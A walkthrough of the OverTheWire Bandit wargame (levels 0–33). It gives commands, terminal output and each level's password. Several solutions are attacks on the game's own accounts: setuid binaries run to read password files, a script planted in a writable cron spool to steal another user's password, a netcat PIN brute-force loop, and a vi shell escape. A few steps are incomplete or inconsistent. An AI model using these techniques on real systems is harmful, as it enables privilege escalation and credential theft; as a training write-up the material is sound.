OverTheWire Bandit challenge walkthrough, levels 1~33

I. Related commands

1. echo prints a string, or the value extracted from a variable, on the terminal; syntax: echo [string] [$variable]. It is one of the most commonly used Linux commands and very simple to use: just run echo string or echo $variable, where the $ sign means "take the actual value of the variable" for the output that follows.

2. find locates files that match the given conditions; syntax: find [search range] [search conditions]

3. head shows the first N lines of a plain-text file; syntax: head [options] filename

4. tr replaces characters in text (short for translate); syntax: tr [source characters] [target characters]

5. wc counts the lines, words or bytes of a text file (short for word count); syntax: wc [options] filename

6. grep extracts lines of text that match a pattern; syntax: grep [options] filename

7. diff compares the contents of files and shows the differences (short for different); syntax: diff [options] filename A filename B

8. uniq removes consecutive duplicate lines from text (short for unique); syntax: uniq [options] filename

9. sort re-sorts the lines of a text file; syntax: sort [options] filename

10. touch creates an empty file or sets a file's timestamps; syntax: touch [options] filename

11. mkdir creates an empty directory (short for make directory); syntax: mkdir [options] directory name

12. cp copies files or directories (short for copy); syntax: cp [options] source file target file

13. mv moves or renames files (short for move); syntax: mv [options] source file target file

14. rm deletes files or directories (short for remove); syntax: rm [options] filename

15. file shows a file's type; syntax: file filename

16. tar packs, compresses or extracts files; syntax: tar options filename

17. The pipe symbol " | "

18. Shell scripts

19. The $? variable holds the exit status of the last command; usually used as echo $?

20. The difference between ">" and ">>"

">" replaces (overwrites) the file; ">>" appends to it.

21. xxd: produce binary-format output (commonly used): xxd -b file.bin. Convert a hex dump back into a binary file: xxd -r file.hex file.bin

II. Level walkthrough

level0→level1

Log in with ssh; this level is about learning the ssh command

ssh bandit0@bandit.labs.overthewire.org -p 2220

Enter the password bandit0 and press Enter. Then ls shows a file called readme, and cat readme gives the password.

bandit0@bandit:~$ ls
readme
bandit0@bandit:~$ cat readme
Congratulations on your first steps into the bandit game!!
Please make sure you have read the rules at https://overthewire.org/rules/
If you are following a course, workshop, walthrough or other educational activity,
please inform the instructor about the rules as well and encourage them to
contribute to the OverTheWire community so we can keep these games free!

The password you are looking for is: ZjLjTmM6FvvyRnrb2rfNWOZOTa6ip5If

level1→level2

Log in with ssh; all later levels are logged into the same way

ssh bandit1@bandit.labs.overthewire.org -p 2220

Because the filename is "-", which every command would treat as an option, it must be accessed through a relative path (./-)

bandit1@bandit:~$ ls
-
bandit1@bandit:~$ cat ./-
263JGJPfgU6LtdEvgfWU1XP5yac29mFx

level2→level3

The filename contains spaces, so wrap it in double quotes

bandit2@bandit:~$ ls
spaces in this filename
bandit2@bandit:~$ cat "spaces in this filename"
MNk8KNH3Usiio41PRUEoDFPqfxLPlSmx

level3→level4

Enter the inhere directory, then list everything including hidden files with ls -al (ll below is the usual alias for it)

bandit3@bandit:~$ cd inhere
bandit3@bandit:~/inhere$ ll
total 12
drwxr-xr-x 2 root    root    4096 Jul 17 15:57 ./
drwxr-xr-x 3 root    root    4096 Jul 17 15:57 ../
-rw-r----- 1 bandit4 bandit3   33 Jul 17 15:57 ...Hiding-From-You
bandit3@bandit:~/inhere$ cat ...Hiding-From-You
2WmrDFRmJIq3IPxneAaMGhap0pFhF3NJ

level4→level5

Enter the inhere directory, ll to list everything, cat ./* to print every file, or file ./* to check the file types (only one file is ASCII text; the rest are binary data)

bandit4@bandit:~/inhere$ cat ./*
[binary garbage from the data files omitted; the readable password line is hidden in it]
bandit4@bandit:~/inhere$ file ./*
./-file00: data
./-file01: data
./-file02: data
./-file03: data
./-file04: data
./-file05: data
./-file06: data
./-file07: ASCII text
./-file08: data
./-file09: data
bandit4@bandit:~/inhere$ cat ./-file07
4oQYVPkxZOOEOO5pTW81FB8j8lxXGUQw

level5→level6

Use find with size options to locate the file that is exactly 1033 bytes (-size 1033c), then cat it

bandit5@bandit:~/inhere$ find -type f -size 1033c
./maybehere07/.file2
bandit5@bandit:~/inhere$ cat ./maybehere07/.file2
HWasnPhtq9AVKe0dmk45nxy20cvUa6EG

The two steps can also be merged into a single command

bandit5@bandit:~/inhere$ cat $(find -type f -size 1033c)
HWasnPhtq9AVKe0dmk45nxy20cvUa6EG

level6→level7

Use find with the conditions given by the level, find / -type f -user bandit7 -group bandit6 -size 33c, to locate the matching file (permission-denied errors for other directories can be silenced with 2>/dev/null)

bandit6@bandit:~$ find / -type f -user bandit7 -group bandit6 -size 33c
bandit6@bandit:~$ cat /var/lib/dpkg/info/bandit7.password
morbNTDkSW6jIlUc0ymOdMaLnOlFVAaj

level7→level8

Use grep to find the line containing the word millionth in the file

bandit7@bandit:~$ cat data.txt | grep millionth
millionth       dfwvzFQi4mU0wfNbFOe9RoWskMLg7eEc

level8→level9

uniq -u (or --unique) prints only the lines that occur exactly once. Because uniq only compares adjacent lines, the file has to be sorted first

bandit8@bandit:~$ ls
data.txt
bandit8@bandit:~$ sort ./data.txt | uniq -u
4CKMh1JI91bUIZZPXDqGanal4xvAg0JM

level9→level10

strings data.txt prints the printable character sequences in the file; grep for == picks out the lines around the password.

bandit9@bandit:~$ strings data.txt | grep ==
\a!;========== the
========== passwordf
========== isc
========== FGUW5ilLVJrxX9kMYMmlN4MgbpfMiqey

level10→level11

Command: base64 -d data.txt

base64 options: -d, --decode (decode); -i, --ignore-garbage (ignore non-alphabet characters when decoding)

bandit10@bandit:~$ ls
data.txt
bandit10@bandit:~$ cat data.txt
VGhlIHBhc3N3b3JkIGlzIGR0UjE3M2ZaS2IwUlJzREZTR3NnMlJXbnBOVmozcVJyCg==
bandit10@bandit:~$ base64 -d data.txt
The password is dtR173fZKb0RRsDFSGsg2RWnpNVj3qRr

level11→level12

Every letter has to be replaced with the letter 13 positions further on (ROT13), e.g. a becomes n and z becomes m; tr does this replacement (quote the character sets so the shell does not treat the brackets as globs)

bandit11@bandit:~$ cat data.txt
Gur cnffjbeq vf 7k16JArUVv5LxVuJfsSVdbbtaHGlw9D4
bandit11@bandit:~$ cat data.txt | tr [a-zA-Z] [n-za-mN-ZA-M]
The password is 7x16WNeHIi5YkIhWsfFIqoognUTyj9Q4

level12→level13

The file is a hex dump, so first turn it back into binary with xxd -r. After that, check the type with file at every step: to decompress with gzip rename the file to end in .gz, for bzip2 rename it to end in .bz2, and for tar rename it to end in .tar. Repeat until data8.txt comes out; it contains the password

bandit12@bandit:~$ mkdir /tmp/highway && cp data.txt /tmp/highway
bandit12@bandit:~$ cd /tmp/highway
bandit12@bandit:/tmp/highway$ cp data.txt /tmp/highway/mytest
bandit12@bandit:/tmp/highway$ xxd -r data.txt > mytest
bandit12@bandit:/tmp/highway$ file mytest
mytest: gzip compressed data, was "data2.bin", last modified: Thu May  7 18:14:30 2020, max compression, from Unix
bandit12@bandit:/tmp/highway$ mv mytest mytest.gz
bandit12@bandit:/tmp/highway$ gzip -d mytest.gz
bandit12@bandit:/tmp/highway$ file mytest
mytest: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/highway$ mv mytest mytest.bz2
bandit12@bandit:/tmp/highway$ bzip2 -d mytest.bz2 && file mytest
mytest: gzip compressed data, was "data4.bin", last modified: Thu May  7 18:14:30 2020, max compression, from Unix
bandit12@bandit:/tmp/highway$ mv mytest mytest.gz
bandit12@bandit:/tmp/highway$ gzip -d  mytest.gz && file mytest
mytest: POSIX tar archive (GNU)
bandit12@bandit:/tmp/highway$ mv mytest mytest.tar
bandit12@bandit:/tmp/highway$ tar xvf mytest.tar
data5.bin
bandit12@bandit:/tmp/highway$ file *
data5.bin:  POSIX tar archive (GNU)
data.txt:   ASCII text
mytest.tar: POSIX tar archive (GNU)
bandit12@bandit:/tmp/highway$ mv data5.bin data5.tar
bandit12@bandit:/tmp/highway$ tar xvf data5.tar
data6.bin
bandit12@bandit:/tmp/highway$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k
bandit12@bandit:/tmp/highway$ cat data8
The password is FO5dwFsc0cbaIiH0h8J2eUks2vdTDwAn
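Instead of renaming by hand after every file call, the layers can be peeled automatically by checking each layer's magic bytes. This is an added example for level 12→13, not code from the original post; it starts from the binary produced by the xxd -r step and assumes gzip, tar and od are installed (bzip2 too if a bz2 layer appears).

```shell
#!/bin/bash
# Added example, not from the original post: unwrap a file nested in
# gzip / bzip2 / tar layers (level 12 -> 13, after xxd -r) by reading
# each layer's magic bytes instead of renaming files by hand.
# Assumes gzip, tar and od are installed (and bzip2 if a bz2 layer occurs).

# Print the container type of a file from its magic bytes:
# gzip = 1f 8b at offset 0, bzip2 = "BZh" at offset 0, tar = "ustar" at 257.
detect_type() {
  local magic
  magic=$(od -An -tx1 -N3 "$1" | tr -d ' \n')
  case "$magic" in
    1f8b*)  echo gzip;  return ;;
    425a68) echo bzip2; return ;;
  esac
  if [ "$(od -An -c -j257 -N5 "$1" 2>/dev/null | tr -d ' \n')" = ustar ]; then
    echo tar
  else
    echo other
  fi
}

# Peel layers into working directory $2 until a non-archive is reached and
# print that file's path. $1 = the outermost (binary) file.
# Usage: unwrap data.bin /tmp/work, then cat the printed path.
unwrap() {
  local cur="$2/layer0" t entry n=0
  mkdir -p "$2" && cp "$1" "$cur" || return 1
  while :; do
    t=$(detect_type "$cur")
    n=$((n + 1))
    case "$t" in
      gzip)  gzip  -dc "$cur" > "$2/layer$n" ;;
      bzip2) bzip2 -dc "$cur" > "$2/layer$n" ;;
      tar)   # each tar layer in the game holds a single member
             entry=$(tar -tf "$cur" | head -n 1)
             tar -xf "$cur" -C "$2" "$entry"
             mv "$2/$entry" "$2/layer$n" ;;
      *)     echo "$cur"; return 0 ;;
    esac
    cur="$2/layer$n"
  done
}
```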

level13→level14

Log in to bandit14 with the private key, ssh -i sshkey.private bandit14@localhost -p 2220, then read the password from /etc/bandit_pass/bandit14

bandit13@bandit:~$ ls
sshkey.private
bandit13@bandit:~$ ssh -i sshkey.private bandit14@localhost -p 2220
The authenticity of host '[localhost]:2220 ([127.0.0.1]:2220)' can't be established.
ED25519 key fingerprint is SHA256:C2ihUBV7ihnV1wUXRb4RrEcLfXC5CXlhmAAM/urerLY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
bandit14@bandit:~$ cat /etc/bandit_pass/bandit14
MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS

level14→level15

Use nc to send the current password straight to port 30000

bandit14@bandit:~$ echo MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS | nc localhost 30000
Correct!
8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo

level15→level16

Use openssl s_client to open a TLS connection to port 30001 and send the current level's password (-ign_eof keeps the connection open until the reply arrives)

bandit15@bandit:~$ echo 8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo | openssl s_client -connect localhost:30001 -ign_eof
read R BLOCK
Correct!
kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx

closed

level16→level17

First scan ports 31000-32000 on the host with nmap. Then try the open ports one by one and send the password to each: openssl s_client -connect localhost:31790 -ign_eof is the one that answers

bandit16@bandit:~$ nmap localhost -p 31000-32000
PORT      STATE SERVICE
31046/tcp open  unknown
31518/tcp open  unknown
31691/tcp open  unknown
31790/tcp open  unknown
31960/tcp open  unknown
bandit16@bandit:~$ echo kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx | openssl s_client -connect localhost:31790 -ign_eof
read R BLOCK
Correct!
-----BEGIN RSA PRIVATE KEY-----
[private key omitted]
-----END RSA PRIVATE KEY-----

Create a new file sshkey.private in /tmp and paste the key above into it. Use chmod so that only the file owner can read and write it (ssh refuses a key that other users can read), then log in with ssh -i

bandit16@bandit:/tmp$ touch sshkey.private
bandit16@bandit:/tmp$ vi sshkey.private
bandit16@bandit:/tmp$ ls -l sshkey.private
-rw-rw-r-- 1 bandit16 bandit16 1675 Jul 25 03:43 sshkey.private
bandit16@bandit:/tmp$ chmod 700 sshkey.private
bandit16@bandit:/tmp$ ls -l sshkey.private
-rwx------ 1 bandit16 bandit16 1675 Jul 25 03:43 sshkey.private
bandit16@bandit:/tmp$ ssh -i sshkey.private bandit17@localhost -p 2220

bandit17@bandit:~$ cat /etc/bandit_pass/bandit17
EReVavePLFHtFlFsjn3hyzMlvSuSAcRD

level17→level18

Get to know diff: it shows where the two files differ, and the line from passwords.new (the upper one, marked <) is the password for the next level

bandit17@bandit:~$ ls
passwords.new  passwords.old
bandit17@bandit:~$ diff -d passwords.new passwords.old
42c42
< x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO
---
> bSrACvJvvBSxEM2SGsV5sn09vc3xgqyp

level18→level19

Logging in with the password normally does not work (the shell logs you out immediately), but ssh can run a command directly instead of starting a shell; enter the previous level's password and cat readme returns the answer

ssh bandit18@bandit.labs.overthewire.org -p 2220 "cat readme" 

bandit18@bandit.labs.overthewire.org's password:
cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8

level19→level20

The bandit20-do file has the setuid bit (the s in -rwsr-x---), which means it runs with the permissions of its owner bandit20 rather than those of the caller; use it to read level 20's password file

bandit19@bandit:~$ ls -al
total 36
drwxr-xr-x  2 root     root      4096 Jul 17 15:57 .
drwxr-xr-x 70 root     root      4096 Jul 17 15:58 ..
-rwsr-x---  1 bandit20 bandit19 14880 Jul 17 15:57 bandit20-do
-rw-r--r--  1 root     root       220 Mar 31 08:41 .bash_logout
-rw-r--r--  1 root     root      3771 Mar 31 08:41 .bashrc
-rw-r--r--  1 root     root       807 Mar 31 08:41 .profile
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO

level20→level21

Command: echo "0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO"|nc -l -p 31111 &. The -l option makes nc listen for a connection instead of connecting to a remote host: when anything connects to local port 31111 it sends the line of text "GbKksEFF4yrVs6il55v6gwY5aVje5f0j". The trailing & puts it in the background so suconnect can be run from the same shell

bandit20@bandit:~$ echo "0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO"|nc -l -p 31111 &
[1] 3835198
bandit20@bandit:~$ ./suconnect 31111
Read: 0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO
Password matches, sending next password
EeoULMCra2q0dSkYj561DX7s1CpBuOBt
[1]+  Done                    echo "0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO" | nc -l -p 31111
bandit20@bandit:~$

level21→level22

First look in /etc/cron.d to see which jobs run, then read the script: it writes the password into a file under /tmp, so cat that file to get it

cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

bandit21@bandit:/usr/bin$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q

level22→level23

Read the bandit23 script the same way. The only thing to do is substitute bandit23 for the whoami variable: the script hashes "I am user bandit23" with md5sum to build the target filename under /tmp

bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

bandit22@bandit:/etc/cron.d$ echo "Copying passwordfile /etc/bandit_pass/bandit23 to /tmp/$mytarget"
Copying passwordfile /etc/bandit_pass/bandit23 to /tmp/8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
0Zf11ioIjMVN551jX3CmStKLYqjk54Ga

level23→level24

Read the bandit24 script: it runs, then deletes, every script in /var/spool/bandit24/foo that is owned by bandit23

bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

Check the directory permissions (bandit24 is writable by everyone)

bandit23@bandit:/tmp$ ls -al /var/spool
total 20
drwxr-xr-x  5 root root     4096 May 14  2020 .
drwxr-xr-x 11 root root     4096 May  7  2020 ..
drwxrwx-wx 62 root bandit24 4096 Jan 19 12:46 bandit24
drwxr-xr-x  3 root root     4096 May  3  2020 cron
lrwxrwxrwx  1 root root        7 May  3  2020 mail -> ../mail
drwx------  2 root root     4096 Jan 14  2018 rsyslog

Write a script and copy it into that directory

bandit23@bandit:/tmp$ vim ./get_pass.sh
 
#!/bin/bash
 
cat /etc/bandit_pass/bandit24 > /tmp/bandit24pass

Copy it into /var/spool/bandit24/foo with cp ./get_pass.sh /var/spool/bandit24/, then wait for the cron job to execute it. Once it has run, the password is gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8
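Two details decide whether the cron job above actually produces output: the dropped script must be executable (the job runs ./$i), and the output file must already exist and be writable by bandit24, who is the user the job runs as. The helper below is an added example, not the original post's script; its paths are parameters so it can be rehearsed in a scratch directory, the real ones being /var/spool/bandit24/foo, a file under /tmp and /etc/bandit_pass/bandit24.

```shell
#!/bin/bash
# Added example, not from the original post: stage the level 23 -> 24 script
# with the permissions the cron job needs. $1 = spool directory scanned by the
# job, $2 = file that will receive the password, $3 = password file that only
# the other user can read. Paths are parameters so this runs in a scratch dir.
stage_pass_grab() {
  local spool="$1" out="$2" src="$3" script
  if [ ! -d "$spool" ] || [ ! -w "$spool" ]; then
    echo "spool dir not writable: $spool" >&2
    return 1
  fi
  # The job runs as the other user and writes here: create the file now,
  # owned by us, and make it world-writable so that user can write to it.
  : > "$out" && chmod 666 "$out" || return 1
  script="$spool/grab_$$.sh"
  cat > "$script" <<EOF
#!/bin/bash
cat '$src' > '$out'
EOF
  chmod 755 "$script"   # the job runs "./\$i", so the exec bit is required
  echo "$script"
}

# Poll until the output file is non-empty or the timeout (seconds) expires;
# prints the captured content and returns 1 on timeout.
wait_for_pass() {
  local out="$1" secs="${2:-90}" i=0
  while [ "$i" -lt "$secs" ]; do
    if [ -s "$out" ]; then
      cat "$out"
      return 0
    fi
    sleep 1
    i=$((i + 1))
  done
  return 1
}
```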

level24→level25

Write a script to brute-force the four-digit PIN: send the previous level's password together with every candidate PIN to port 30002

bandit24@bandit:/tmp$ vi boom.sh

#!/bin/bash
# Write one "<password> <pin>" line for every PIN from 0000 to 9999
for i in {0..9}{0..9}{0..9}{0..9}
do
    echo "gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8 $i" >> bandit25
done
# Send all candidates over one connection and keep every response
cat ./bandit25 | nc localhost 30002 >> bandit25pass
# The reply for the correct PIN is at the end of the output
tail -5 bandit25pass

bandit24@bandit:/tmp$ bash boom.sh
Wrong! Please enter the correct current password and pincode. Try again.
Wrong! Please enter the correct current password and pincode. Try again.
Correct!
The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4

level25→level26

First connect to bandit26 with ssh -i; the connection closes immediately, so look up bandit26's login shell in /etc/passwd. It is a script that runs more

bandit25@bandit:~$ cat /etc/passwd|grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
bandit25@bandit:~$ cat /usr/bin/showtext
#!/bin/sh
 
export TERM=linux
 
more ~/text.txt
exit 0

Shrink the terminal window to its smallest height (so more has to pause), then reconnect

bandit25@bandit:~$ ssh bandit26@localhost -i bandit26.sshkey

Once more is paused, press v to open the file in vi, type :r /etc/bandit_pass/bandit26 and press Enter twice; the password s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ is read into the buffer

level26→level27

Logging in to 26 with the password gives the same situation as in 25: bash exits right away. Use the more trick again: shrink the terminal window, press v to enter vi, then type :set shell=/bin/sh followed by :sh to get a shell

:set shell=/bin/sh
:sh
[No write since last change]
$ ls
bandit27-do  text.txt
$ ls -al
total 36
drwxr-xr-x  3 root     root     4096 May  7  2020 .
drwxr-xr-x 41 root     root     4096 May  7  2020 ..
-rwsr-x---  1 bandit27 bandit26 7296 May  7  2020 bandit27-do
-rw-r--r--  1 root     root      220 May 15  2017 .bash_logout
-rw-r--r--  1 root     root     3526 May 15  2017 .bashrc
-rw-r--r--  1 root     root      675 May 15  2017 .profile
drwxr-xr-x  2 root     root     4096 May  7  2020 .ssh
-rw-r-----  1 bandit26 bandit26  258 May  7  2020 text.txt
$ ./bandit27-do cat /etc/bandit_pass/bandit27
upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB

level27→level28

Go into /tmp/bandit27/ and run git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo; after cloning, enter repo and read the README

bandit27@bandit:~$ mkdir /tmp/highway27 && cd /tmp/highway27
bandit27@bandit:/tmp/highway27$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
Cloning into 'repo'...
remote: Counting objects: 3, done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (3/3), done.
bandit27@bandit:/tmp/highway27$ ls -l
total 4
drwxr-sr-x 3 bandit27 root 4096 Jun 24 02:47 repo
bandit27@bandit:/tmp/highway27$ ls -l /tmp/highway27/repo
total 4
-rw-r--r-- 1 bandit27 root 68 Jun 24 02:47 README
bandit27@bandit:/tmp/highway27$ cat /tmp/highway27/repo/README
The password to the next level is: Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN

level28→level29

First clone the repository

bandit28@bandit:~$ mkdir /tmp/highway28 && cd /tmp/highway28
bandit28@bandit:/tmp/highway28$ git clone ssh://bandit28-git@localhost/home/bandit28-git/repo

Then look at what was cloned

bandit28@bandit:/tmp/highway28$ ls -l /tmp/highway28/repo
total 4
-rw-r--r-- 1 bandit28 root 111 Jun 24 03:03 README.md
bandit28@bandit:/tmp/highway28$ cat /tmp/highway28/repo/README.md
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: xxxxxxxxxx

The password has been replaced with x's, so check the commit history with git show (the previous version of README.md is still in the log); the password is 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7

level29→level30

As before, clone the repo locally and read the hint in README.md

bandit29@bandit:/tmp/highway29$ cd repo && cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: <no passwords in production!>

Use git branch -a to list all branches and git checkout dev to switch to the dev branch; the password is in README.md on that branch

bandit29@bandit:/tmp/highway29/repo$ git checkout dev
Branch dev set up to track remote branch dev from origin.
Switched to a new branch 'dev'
bandit29@bandit:/tmp/highway29/repo$ cat README.md
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL

level30→level31

bandit30@bandit:/tmp/highway30/repo$ cat README.md
just an epmty file... muahaha

After cloning, README.md in repo has no password. git show-ref lists every reference in the local repository together with the commit ID it points to; it reveals a ref named secret, and git show secret gives the password

bandit30@bandit:/tmp/highway30/repo$ git show secret
47e603bb428404d265f59c42920d81e5

level31→level32

Create key.txt and add it to the staging area with git add key.txt (the repository's .gitignore ignores *.txt, hence the -f below), then git commit -m "key", and finally git push

# create the file key.txt
bandit31@bandit:/tmp/bandit31/repo$ echo 'May I come in?' >> key.txt
# stage it (forced past .gitignore)
bandit31@bandit:/tmp/bandit31/repo$ git add -f ./key.txt
# check that we are on master
bandit31@bandit:/tmp/bandit31/repo$ git status
On branch master
Your branch is up-to-date with 'origin/master'.
Changes to be committed:
  (use "git reset HEAD <file>..." to unstage)
 
	new file:   key.txt
 
# commit to the local repository
bandit31@bandit:/tmp/bandit31/repo$ git commit -m 'key.txt'
[master 088ccca] key.txt
 1 file changed, 1 insertion(+)
 create mode 100644 key.txt
# push to the remote origin master
bandit31@bandit:/tmp/bandit31/repo$ git push origin master
Could not create directory '/home/bandit31/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
bandit31-git@localhost's password:
Counting objects: 3, done.
Delta compression using up to 2 threads.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 319 bytes | 0 bytes/s, done.
Total 3 (delta 0), reused 0 (delta 0)
remote: ### Attempting to validate files... ####
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
remote: Well done! Here is the password for the next level:
remote: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K
remote:
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote:
To ssh://localhost/home/bandit31-git/repo
 ! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://bandit31-git@localhost/home/bandit31-git/repo'

level32→level33

This level needs $0: the uppercase shell converts every command to uppercase, but $0 is not a letter, and it expands to the name of the running shell (sh), which starts a normal shell. Then cat /etc/bandit_pass/bandit33

WELCOME TO THE UPPERCASE SHELL
>> $0
$ cat /etc/bandit_pass/bandit33
tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0
